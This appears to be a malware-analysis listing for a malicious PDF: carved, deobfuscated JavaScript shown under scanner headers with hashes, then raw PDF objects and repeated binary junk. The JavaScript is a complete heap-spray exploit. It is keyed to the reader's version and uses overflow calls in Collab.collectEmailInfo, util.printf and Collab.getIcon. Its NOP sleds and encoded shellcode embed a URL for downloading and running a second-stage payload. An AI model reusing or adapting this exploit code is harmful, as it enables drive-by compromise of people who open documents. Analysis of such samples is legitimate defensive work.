function EELLE(){var BmuXD=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0033\u0000\x15\x20\x15\x20\x15\x20\x15\x20");gVf=KaX("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BmuXD;KBY=KaX("\u9090\u9090");frL=5*2;wFM=frL+gVf.length;while(KBY.length<wFM)KBY+=KBY;elW=KBY.substring(0,wFM);ZTJ=KBY.substring(0,KBY.length-wFM);while(ZTJ.length+wFM<0x40000)ZTJ=ZTJ+ZTJ+elW;JCe=[];for(Uwp=0;Uwp<180;Uwp++)JCe[Uwp]=ZTJ+gVf;var ysT=4012;var WDe=Array(ysT);for(Uwp=0;Uwp<ysT;Uwp++)
{WDe[Uwp]=KaX("\u000a\u000a\u000a\u000a");}
Collab.getIcon(WDe+"_N.bundle");}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x497 12131 bytes
SHA-256: 56b6449299d17054cfab48c9b39bfe7e716702916b2000a648eda90a837728cb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var KaX=unescape,xFW=app.viewerVersion.toString(),Nbr=KaX("t\h\i\s");Nbr=eval(Nbr);if(xFW<8)
{TeIhR();}
if(xFW>=8&&xFW<9)
{Ygv();}
if(xFW<=9)
{EELLE();}
function NDOjz(hJelR,WrmXP){while(hJelR.length*2<WrmXP){hJelR+=hJelR;}
return hJelR.substring(0,WrmXP/2);}
function TeIhR(){var Abybr=KaX("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0032\u0000\u4715\u4715\u4715\u4715");var TatDN=0x0c0c0c0c;var ehLiP=[];var xLbSX=0x400000;var wPUIt=Abybr.length*2;var WrmXP=xLbSX-(wPUIt+0x38);var hJelR=KaX("\u9090\u9090");hJelR=NDOjz(hJelR,WrmXP);var BQrnN=(TatDN-0x400000)/xLbSX;for(var xzbiZ=0;xzbiZ<BQrnN;xzbiZ++){ehLiP[xzbiZ]=hJelR+Abybr;}
var ULlYf=KaX("\u0c0c\u0c0c");while(ULlYf.length<44952)ULlYf+=ULlYf;this.collabStore=Collab.collectEmailInfo({subj:"",msg:ULlYf});}
function Ygv(){var jMB=new Array();function AyL(QFc,Ppm){while(QFc.length*2<Ppm){QFc+=QFc;}
QFc=QFc.substring(0,Ppm/2);return QFc;}
fXC=0x30303030;WwI=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0031\u0000\u0000%17%35%17%35%17%35%17%35");var bSi=0x400000;var vJX=WwI.length*2;var Ppm=bSi-(vJX+0x38);var QFc=KaX("\u9090\u9090");QFc=AyL(QFc,Ppm);var coN=(fXC-0x400000)/bSi;for(var CDY=0;CDY<coN;CDY++){jMB[CDY]=QFc+WwI;}
var KXz="86858718733100516971";for(KaX=0;KaX<138*2;KaX++){KXz+="1";}
util.printf("%45000f",KXz);}
function sqt(DmQ)
{DmQ=DmQ.replace(/[\+1]/g,"0");DmQ=DmQ.replace(/[\+2]/g,"9");DmQ=DmQ.replace(/[\+3]/g,"8");DmQ=DmQ.replace(/[\+4]/g,"7");DmQ=DmQ.replace(/[\+5]/g,"6");DmQ=DmQ.replace(/[\+6]/g,"5");DmQ=DmQ.replace(/[\+7]/g,"4");DmQ=DmQ.replace(/[\+8]/g,"3");DmQ=DmQ.replace(/[\+9]/g,"2");DmQ=DmQ.replace(/[\+0]/g,"1");return DmQ;}
function EELLE(){var BmuXD=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0033\u0000\x15\x20\x15\x20\x15\x20\x15\x20");gVf=KaX("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BmuXD;KBY=KaX("\u9090\u9090");frL=5*2;wFM=frL+gVf.length;while(KBY.length<wFM)KBY+=KBY;elW=KBY.substring(0,wFM);ZTJ=KBY.substring(0,KBY.length-wFM);while(ZTJ.length+wFM<0x40000)ZTJ=ZTJ+ZTJ+elW;JCe=[];for(Uwp=0;Uwp<180;Uwp++)JCe[Uwp]=ZTJ+gVf;var ysT=4012;var WDe=Array(ysT);for(Uwp=0;Uwp<ysT;Uwp++)
{WDe[Uwp]=KaX("\u000a\u000a\u000a\u000a");}
Collab.getIcon(WDe+"_N.bundle");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД"  –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ   ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+987>>
stream
x^�W[o � ~ϯ@�X�� z��/�� in- � X`	KБ�3I� '��$ ����U;!^�۾� �Դ�^�]U�  �� O�{�r�] �ϻͫ� ��o}�t����n~19�m-�^.��q ���`^@��[��O�/z� Q����`49�Cɶ l\��vN~� F_6"�_���' s �  �C�.�k���V�G��� � <k���s��I7�m���t�����d2�"jk�͎ '?��+�`��|�f�-��ك�{�<��a���q�fj��5�R |�	t ��L�C �j �� �����^U U��l�  �R��B	��_��ք!��r�M�Z�Xی��%` l �i����m�ȩ�S�G�*'�&�Ԥ�u�"O"���,�%'��#�5�*�
OB���Kr&ʀ�\ڈu�k:aK)r���N/�4l�s2� �2�?� �(E��r�!@�q�y(Sd�ڄ�se�$d���U	=�%:�մX	O��o�
��*`���h˻
0� �<�
��J�����AS[ZR*
V<�T �O$��_�� ����ʶ�U%�� ���{]�<	��)���Nrd/���W< ��o��e   c<!ߍ� _��F�r����VS3?U��O�*`�COU3"���9v � ��y
� )�@n������5��  l�(�d��=�麍�l���b�Z�� ��#�����T��[�$�Z��1�ͤ"\���2R� +���� �C�����y�'Ж�rZj漩�)m� ��%�1�cV�\� 0 � L� >� ��I� �[�-C�󐴊�O ����_ ��Wfe �>אju�� DIA�Ni��"�H%)OiS�?�K$ 3�(�x%'�� ���  v	�Yd�)'g[3Kmʓ�-�I����fM|.<�B��e��N�C?��-  6�� �K[��3א�]�t�e� �M#>X ��<�� �  �� � ��� �
1�ر_� ͳB]���_�����y�����=x� ��ڔ�.���Y ��oG� d> "�/\Cu�}4%�$NAl��� ! ��og��U/�gE_ }t���   ������� � �w[D�z8 \K8����8��;& e_�N� ���  q��+�L����βܤ A
 �� '���ó�t|�rq6�Zւ�  ��x2ݙ ���1J?���m�^ �"�_�&��v�� ~��Yw����ǟ0�o�z�i��" n>??�����u�  �a �� �Z ��� _
��w�Wc����Go.wn R+Ne/��U�MS�C
dʳ�*��Jj�]_�8�� � ��+����Ք5�R�Ԑ2e�jL N�4�>Bj&sڤ������ N���  ǵ��:�h�JP�^ �^�,�( V�&&�y�� # ��-'k�*�i��S���{j�Cͩ�9�3%w�xw� �3��ږuuc��lk�u��W x���6H*��^qV�@N� *�7"� l!jT�� d}Y���m	� � �@� � ���  
��n  �� aK�c��S)�}ɾ�����3 �V�D �-�
N[;h3 ��o�jyӊ7�U�U o㩀���_w�Ne�4oi:��M @m�-
	"
�颶x 4N��SOh�j%K�x����@
��� {�� ԑy��# >L�Cm����|�r��s?>�+P��� �\��Q �;��U��>K�� "��� � � ��B�mg���諀�`�  �� ���[��j�I��}.z ��;ܬ�N�2��]� u|2� �v���)WT �a� ϗ��b2�:�ccq��=�zÞQ �਷	ε�y��ߜ��  ���ּ;�� ���w������� �����P�{�Z�� j&Tw � ��C�B5�P�P�{�^�� j.�� � j ��#)w_��G����t���  ? �� �^��я p� � .'�|Q�ǿ��H�ޔ�ޚ ��?2�  �ێ�Vo�;��滅��� � X q2Vw��� �7� � �sX ��� ~׮�d ����7��J 	O|��s�z ����5� �
� +�'u��"G���s�x����   �wX�  �/��O ��L%i|66] �:@㵳� ����k0FU��
�i,5� Q?_6V���n�sx6�Cr���3�#�  �3��N :r� =Wj�x�K K�v�L+�)w�M�	�
��rN�, I��8 vB"%
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �xګ��������G��f�g߳��\ ? �����\>ɂ��II  &_ �
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x497 12152 bytes
SHA-256: ec63491670fedd948c93fc77c7df79c83f1f3a74c741fbec9b27c8cc05280029
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var KaX=unescape,xFW=app.viewerVersion.toString(),Nbr=KaX("t\h\i\s");Nbr=eval(Nbr);if(xFW<8)
{TeIhR();}
if(xFW>=8&&xFW<9)
{Ygv();}
if(xFW<=9)
{EELLE();}
function NDOjz(hJelR,WrmXP){while(hJelR.length*2<WrmXP){hJelR+=hJelR;}
return hJelR.substring(0,WrmXP/2);}
function TeIhR(){var Abybr=KaX("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0032\u0000\u4715\u4715\u4715\u4715");var TatDN=0x0c0c0c0c;var ehLiP=[];var xLbSX=0x400000;var wPUIt=Abybr.length*2;var WrmXP=xLbSX-(wPUIt+0x38);var hJelR=KaX("\u9090\u9090");hJelR=NDOjz(hJelR,WrmXP);var BQrnN=(TatDN-0x400000)/xLbSX;for(var xzbiZ=0;xzbiZ<BQrnN;xzbiZ++){ehLiP[xzbiZ]=hJelR+Abybr;}
var ULlYf=KaX("\u0c0c\u0c0c");while(ULlYf.length<44952)ULlYf+=ULlYf;this.collabStore=Collab.collectEmailInfo({subj:"",msg:ULlYf});}
function Ygv(){var jMB=new Array();function AyL(QFc,Ppm){while(QFc.length*2<Ppm){QFc+=QFc;}
QFc=QFc.substring(0,Ppm/2);return QFc;}
fXC=0x30303030;WwI=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0031\u0000\u0000%17%35%17%35%17%35%17%35");var bSi=0x400000;var vJX=WwI.length*2;var Ppm=bSi-(vJX+0x38);var QFc=KaX("\u9090\u9090");QFc=AyL(QFc,Ppm);var coN=(fXC-0x400000)/bSi;for(var CDY=0;CDY<coN;CDY++){jMB[CDY]=QFc+WwI;}
var KXz="86858718733100516971";for(KaX=0;KaX<138*2;KaX++){KXz+="1";}
util.printf("%4"+"50"+"00"+"f",KXz);}
function sqt(DmQ)
{DmQ=DmQ.replace(/[\+1]/g,"0");DmQ=DmQ.replace(/[\+2]/g,"9");DmQ=DmQ.replace(/[\+3]/g,"8");DmQ=DmQ.replace(/[\+4]/g,"7");DmQ=DmQ.replace(/[\+5]/g,"6");DmQ=DmQ.replace(/[\+6]/g,"5");DmQ=DmQ.replace(/[\+7]/g,"4");DmQ=DmQ.replace(/[\+8]/g,"3");DmQ=DmQ.replace(/[\+9]/g,"2");DmQ=DmQ.replace(/[\+0]/g,"1");return DmQ;}
function EELLE(){var BmuXD=KaX("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u7467\u263B\u3D65\u0033\u0000\x15\x20\x15\x20\x15\x20\x15\x20");gVf=KaX("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BmuXD;KBY=KaX("\u9090\u9090");frL=5*2;wFM=frL+gVf.length;while(KBY.length<wFM)KBY+=KBY;elW=KB